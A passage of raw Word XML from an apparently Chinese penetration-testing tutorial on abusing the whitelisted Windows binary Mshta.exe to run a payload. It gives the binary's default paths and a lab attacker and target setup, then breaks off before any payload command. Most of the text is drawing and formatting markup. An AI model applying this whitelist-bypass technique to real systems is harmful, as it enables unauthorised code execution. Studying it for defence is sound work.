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ict>
      <v:group style="position:absolute;margin-left:58.27pt;margin-top:273.27pt;width:2.972pt;height:12.972pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1160,5460" coordsize="59,259">
        <v:shape style="position:absolute;left:1160;top:5460;width:59;height:259" coordorigin="1160,5460" coordsize="59,259" path="m1188,5460l1188,5460,1188,5460,1188,5460,1188,5460,1188,5460,1188,5460,1188,5460,1188,5460,1188,5460,1188,5460,1188,5460,1188,5460,1188,5461,1188,5461,1188,5461,1188,5461,1188,5461,1188,5461,1188,5461,1188,5461,1188,5461,1188,5462,1188,5462,1188,5462,1188,5462,1188,5463,1188,5463,1188,5463,1188,5464,1188,5464,1188,5464,1188,5465,1188,5465,1188,5466,1188,5466,1188,5467,1188,5467,1188,5468,1188,5469,1188,5469,1188,5470,1188,5471,1188,5472,1188,5472,1188,5473,1188,5474,1188,5475,1188,5476,1188,5477,1188,5478,1188,5479,1188,5481,1188,5482,1188,5483,1188,5484,1188,5486,1188,5487,1188,5489,1188,5490,1188,5492,1188,5494,1188,5495,1188,5497,1188,5499,1188,5501,1188,5503,1188,5505,1188,5507,1188,5509,1188,5511,1188,5513,1188,5515,1188,5518,1188,5520,1188,5523,1188,5525,1188,5528,1188,5531,1188,5533,1188,5536,1188,5539,1188,5542,1188,5545,1188,5548,1188,5551,1188,5555,1188,5558,1188,5562,1188,5565,1188,5569,1188,5572,1188,5576,1188,5580,1188,5584,1188,5588,1188,5592,1188,5596,1188,5601,1188,5605,1188,5610,1188,5614,1188,5619,1188,5624,1188,5628,1188,5633,1188,5638,1188,5644,1188,5649,1188,5654,1188,5660,1188,5665,1188,5671,1188,5676,1188,5682,1188,5688,1188,5694,1188,5700,1188,5707,1188,5713,1188,5720e" filled="f" stroked="t" strokeweight="1.945pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.27pt;margin-top:285.27pt;width:2.972pt;height:13.972pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1160,5700" coordsize="59,279">
        <v:shape style="position:absolute;left:1160;top:5700;width:59;height:279" coordorigin="1160,5700" coordsize="59,279" path="m1188,5720l1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5720,1188,5721,1188,5721,1188,5721,1188,5721,1188,5721,1188,5721,1188,5722,1188,5722,1188,5722,1188,5723,1188,5723,1188,5723,1188,5724,1188,5724,1188,5725,1188,5725,1188,5726,1188,5726,1188,5727,1188,5727,1188,5728,1188,5729,1188,5729,1188,5730,1188,5731,1188,5732,1188,5733,1188,5734,1188,5735,1188,5736,1188,5737,1188,5738,1188,5739,1188,5740,1188,5741,1188,5743,1188,5744,1188,5745,1188,5747,1188,5748,1188,5750,1188,5751,1188,5753,1188,5755,1188,5756,1188,5758,1188,5760,1188,5762,1188,5764,1188,5766,1188,5768,1188,5770,1188,5772,1188,5775,1188,5777,1188,5779,1188,5782,1188,5785,1188,5787,1188,5790,1188,5793,1188,5795,1188,5798,1188,5801,1188,5804,1188,5808,1188,5811,1188,5814,1188,5817,1188,5821,1188,5824,1188,5828,1188,5832,1188,5836,1188,5839,1188,5843,1188,5847,1188,5852,1188,5856,1188,5860,1188,5864,1188,5869,1188,5874,1188,5878,1188,5883,1188,5888,1188,5893,1188,5898,1188,5903,1188,5908,1188,5913,1188,5919,1188,5924,1188,5930,1188,5936,1188,5942,1188,5948,1188,5954,1188,5960,1188,5966,1188,5972,1188,5979e" filled="f" stroked="t" strokeweight="1.945pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.27pt;margin-top:745.27pt;width:455.972pt;height:29.972pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1420,14900" coordsize="9119,599">
        <v:shape style="position:absolute;left:1420;top:14900;width:9119;height:599" coordorigin="1420,14900" coordsize="9119,599" path="m1440,14926l1440,14926,1440,14926,1440,14926,1441,14926,1441,14926,1441,14926,1442,14926,1442,14926,1443,14926,1444,14926,1446,14926,1448,14926,1450,14926,1452,14926,1455,14926,1459,14926,1463,14926,1467,14926,1472,14926,1477,14926,1484,14926,1490,14926,1498,14926,1506,14926,1515,14926,1525,14926,1535,14926,1547,14926,1559,14926,1572,14926,1586,14926,1601,14926,1617,14926,1635,14926,1653,14926,1672,14926,1692,14926,1714,14926,1737,14926,1761,14926,1786,14926,1813,14926,1841,14926,1870,14926,1901,14926,1933,14926,1966,14926,2001,14926,2038,14926,2076,14926,2116,14926,2157,14926,2200,14926,2245,14926,2291,14926,2339,14926,2389,14926,2441,14926,2494,14926,2550,14926,2607,14926,2667,14926,2728,14926,2791,14926,2856,14926,2924,14926,2993,14926,3065,14926,3139,14926,3215,14926,3293,14926,3374,14926,3457,14926,3542,14926,3629,14926,3719,14926,3812,14926,3907,14926,4004,14926,4104,14926,4206,14926,4311,14926,4419,14926,4529,14926,4642,14926,4758,14926,4876,14926,4998,14926,5122,14926,5249,14926,5378,14926,5511,14926,5647,14926,5785,14926,5927,14926,6072,14926,6220,14926,6371,14926,6525,14926,6682,14926,6842,14926,7006,14926,7173,14926,7343,14926,7517,14926,7694,14926,7874,14926,8058,14926,8245,14926,8436,14926,8630,14926,8828,14926,9030,14926,9235,14926,9444,14926,9656,14926,9872,14926,10092,14926,10316,14926,10543,14926,10543,14926,10543,14926,10543,14926,10543,14926,10543,14926,10543,14926,10543,14926,10543,14927,10543,14927,10543,14927,10543,14927,10543,14927,10543,14927,10543,14927,10543,14927,10543,14928,10543,14928,10543,14928,10543,14928,10543,14929,10543,14929,10543,14930,10543,14930,10543,14931,10543,14931,10543,14932,10543,14932,10543,14933,10543,14934,10543,14935,10543,14936,10543,14937,10543,14938,10543,14939,10543,14940,10543,14941,10543,14943,10543,14944,10543,14945,10543,14947,10543,14949,10543,14950,10543,14952,10543,14954,10543,14956,10543,14958,10543,14960,10543,14962,10543,14965,10543,14967,10543,14970,10543,14972,10543,14975,10543,14978,10543,14981,10543,14984,10543,14987,10543,14991,10543,14994,10543,14998,10543,15001,10543,15005,10543,15009,10543,15013,10543,15017,10543,15021,10543,15026,10543,15031,10543,15035,10543,15040,10543,15045,10543,15050,10543,15056,10543,15061,10543,15067,10543,15072,10543,15078,10543,15084,10543,15091,10543,15097,10543,15104,10543,15110,10543,15117,10543,15124,10543,15132,10543,15139,10543,15147,10543,15154,10543,15162,10543,15171,10543,15179,10543,15187,10543,15196,10543,15205,10543,15214,10543,15223,10543,15233,10543,15242,10543,15252,10543,15262,10543,15273,10543,15283,10543,15294,10543,15305,10543,15316,10543,15327,10543,15339,10543,15351,10543,15363,10543,15375,10543,15387,10543,15400,10543,15413,10543,15426,10543,15439,10543,15453,10543,15467,10543,15481,10543,15495,10543,15510,10543,15510,10543,15510,10543,15510,10543,15510,10543,15510,10543,15510,10542,15510,10542,15510,10541,15510,10540,15510,10538,15510,10536,15510,10534,15510,10532,15510,10529,15510,10525,15510,10521,15510,10517,15510,10512,15510,10506,15510,10500,15510,10493,15510,10486,15510,10478,15510,10469,15510,10459,15510,10449,15510,10437,15510,10425,15510,10412,15510,10398,15510,10383,15510,10366,15510,10349,15510,10331,15510,10312,15510,10291,15510,10270,15510,10247,15510,10223,15510,10198,15510,10171,15510,10143,15510,10114,15510,10083,15510,10051,15510,10018,15510,9983,15510,9946,15510,9908,15510,9868,15510,9827,15510,9784,15510,9739,15510,9693,15510,9645,15510,9595,15510,9543,15510,9489,15510,9434,15510,9377,15510,9317,15510,9256,15510,9193,15510,9127,15510,9060,15510,8990,15510,8919,15510,8845,15510,8769,15510,8691,15510,8610,15510,8527,15510,8442,15510,8354,15510,8265,15510,8172,15510,8077,15510,7980,15510,7880,15510,7778,15510,7673,15510,7565,15510,7455,15510,7342,15510,7226,15510,7108,15510,6986,15510,6862,15510,6735,15510,6605,15510,6473,15510,6337,15510,6198,15510,6057,15510,5912,15510,5764,15510,5613,15510,5459,15510,5302,15510,5142,15510,4978,15510,4811,15510,4641,15510,4467,15510,4290,15510,4110,15510,3926,15510,3739,15510,3548,15510,3354,15510,3156,15510,2954,15510,2749,15510,2540,15510,2328,15510,2112,15510,1892,15510,1668,15510,1440,15510,1440,15510,1440,15510,1440,15510,1440,15510,1440,15510,1440,15510,1440,15510,1440,15510,1440,15510,1440,15510,1440,15510,1440,15509,1440,15509,1440,15509,1440,15509,1440,15509,1440,15509,1440,15508,1440,15508,1440,15508,1440,15507,1440,15507,1440,15506,1440,15506,1440,15505,1440,15505,1440,15504,1440,15503,1440,15502,1440,15501,1440,15501,1440,15500,1440,15499,1440,15497,1440,15496,1440,15495,1440,15494,1440,15492,1440,15491,1440,15489,1440,15488,1440,15486,1440,15484,1440,15482,1440,15480,1440,15478,1440,15476,1440,15474,1440,15472,1440,15469,1440,15467,1440,15464,1440,15461,1440,15458,1440,15455,1440,15452,1440,15449,1440,15446,1440,15442,1440,15439,1440,15435,1440,15431,1440,15427,1440,15423,1440,15419,1440,15415,1440,15410,1440,15406,1440,15401,1440,15396,1440,15391,1440,15386,1440,15381,1440,15375,1440,15370,1440,15364,1440,15358,1440,15352,1440,15346,1440,15339,1440,15333,1440,15326,1440,15319,1440,15312,1440,15305,1440,15297,1440,15290,1440,15282,1440,15274,1440,15266,1440,15257,1440,15249,1440,15240,1440,15231,1440,15222,1440,15213,1440,15204,1440,15194,1440,15184,1440,15174,1440,15164,1440,15153,1440,15142,1440,15132,1440,15120,1440,15109,1440,15098,1440,15086,1440,15074,1440,15061,1440,15049,1440,15036,1440,15023,1440,15010,1440,14997,1440,14983,1440,14969,1440,14955,1440,14941,1440,14926e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.27pt;margin-top:745.27pt;width:455.972pt;height:1.972pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1420,14900" coordsize="9119,39">
        <v:shape style="position:absolute;left:1420;top:14900;width:9119;height:39" coordorigin="1420,14900" coordsize="9119,39" path="m1440,14933l1440,14933,1440,14933,1440,14933,1441,14933,1441,14933,1441,14933,1442,14933,1442,14933,1443,14933,1444,14933,1446,14933,1448,14933,1450,14933,1452,14933,1455,14933,1459,14933,1463,14933,1467,14933,1472,14933,1477,14933,1484,14933,1490,14933,1498,14933,1506,14933,1515,14933,1525,14933,1535,14933,1547,14933,1559,14933,1572,14933,1586,14933,1601,14933,1617,14933,1635,14933,1653,14933,1672,14933,1692,14933,1714,14933,1737,14933,1761,14933,1786,14933,1813,14933,1841,14933,1870,14933,1901,14933,1933,14933,1966,14933,2001,14933,2038,14933,2076,14933,2116,14933,2157,14933,2200,14933,2245,14933,2291,14933,2339,14933,2389,14933,2441,14933,2494,14933,2550,14933,2607,14933,2667,14933,2728,14933,2791,14933,2856,14933,2924,14933,2993,14933,3065,14933,3139,14933,3215,14933,3293,14933,3374,14933,3457,14933,3542,14933,3629,14933,3719,14933,3812,14933,3907,14933,4004,14933,4104,14933,4206,14933,4311,14933,4419,14933,4529,14933,4642,14933,4758,14933,4876,14933,4998,14933,5122,14933,5249,14933,5378,14933,5511,14933,5647,14933,5785,14933,5927,14933,6072,14933,6220,14933,6371,14933,6525,14933,6682,14933,6842,14933,7006,14933,7173,14933,7343,14933,7517,14933,7694,14933,7874,14933,8058,14933,8245,14933,8436,14933,8630,14933,8828,14933,9030,14933,9235,14933,9444,14933,9656,14933,9872,14933,10092,14933,10316,14933,10543,14933e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.27pt;margin-top:774.27pt;width:455.972pt;height:0.972pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1420,15480" coordsize="9119,19">
        <v:shape style="position:absolute;left:1420;top:15480;width:9119;height:19" coordorigin="1420,15480" coordsize="9119,19" path="m1440,15503l1440,15503,1440,15503,1440,15503,1441,15503,1441,15503,1441,15503,1442,15503,1442,15503,1443,15503,1444,15503,1446,15503,1448,15503,1450,15503,1452,15503,1455,15503,1459,15503,1463,15503,1467,15503,1472,15503,1477,15503,1484,15503,1490,15503,1498,15503,1506,15503,1515,15503,1525,15503,1535,15503,1547,15503,1559,15503,1572,15503,1586,15503,1601,15503,1617,15503,1635,15503,1653,15503,1672,15503,1692,15503,1714,15503,1737,15503,1761,15503,1786,15503,1813,15503,1841,15503,1870,15503,1901,15503,1933,15503,1966,15503,2001,15503,2038,15503,2076,15503,2116,15503,2157,15503,2200,15503,2245,15503,2291,15503,2339,15503,2389,15503,2441,15503,2494,15503,2550,15503,2607,15503,2667,15503,2728,15503,2791,15503,2856,15503,2924,15503,2993,15503,3065,15503,3139,15503,3215,15503,3293,15503,3374,15503,3457,15503,3542,15503,3629,15503,3719,15503,3812,15503,3907,15503,4004,15503,4104,15503,4206,15503,4311,15503,4419,15503,4529,15503,4642,15503,4758,15503,4876,15503,4998,15503,5122,15503,5249,15503,5378,15503,5511,15503,5647,15503,5785,15503,5927,15503,6072,15503,6220,15503,6371,15503,6525,15503,6682,15503,6842,15503,7006,15503,7173,15503,7343,15503,7517,15503,7694,15503,7874,15503,8058,15503,8245,15503,8436,15503,8630,15503,8828,15503,9030,15503,9235,15503,9444,15503,9656,15503,9872,15503,10092,15503,10316,15503,10543,15503e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:71.400pt;margin-top:744.600pt;width:453.0pt;height:30.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:53.400pt;margin-top:425.400pt;width:405.0pt;height:249.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8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42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2" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>专注APT攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>击与防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="87" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>s://micropoor.blogspot.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Msht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a简介：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="87" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="319" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="1141" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mshta.exe是微软Windows操作系统相关程序，英文全称Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Application，可翻译为微软超</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文本标记语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用，用于执行.HTA文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="363" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="638" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="2412" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mshta所在路径已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被系统添加PATH环境变量中，因此，可直接执行Mshta.exe命令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基于白名单Mshta.exe配置p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ayload：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="286" w:lineRule="auto"/>
        <w:ind w:left="1427" w:right="7445" w:firstLine="-324"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认位置：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C:\Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\System32\mshta.exe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pacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C:\Windows\SysWOW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>64\mshta.exe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24" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="41"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Debian</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="87" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="638" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="7646" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
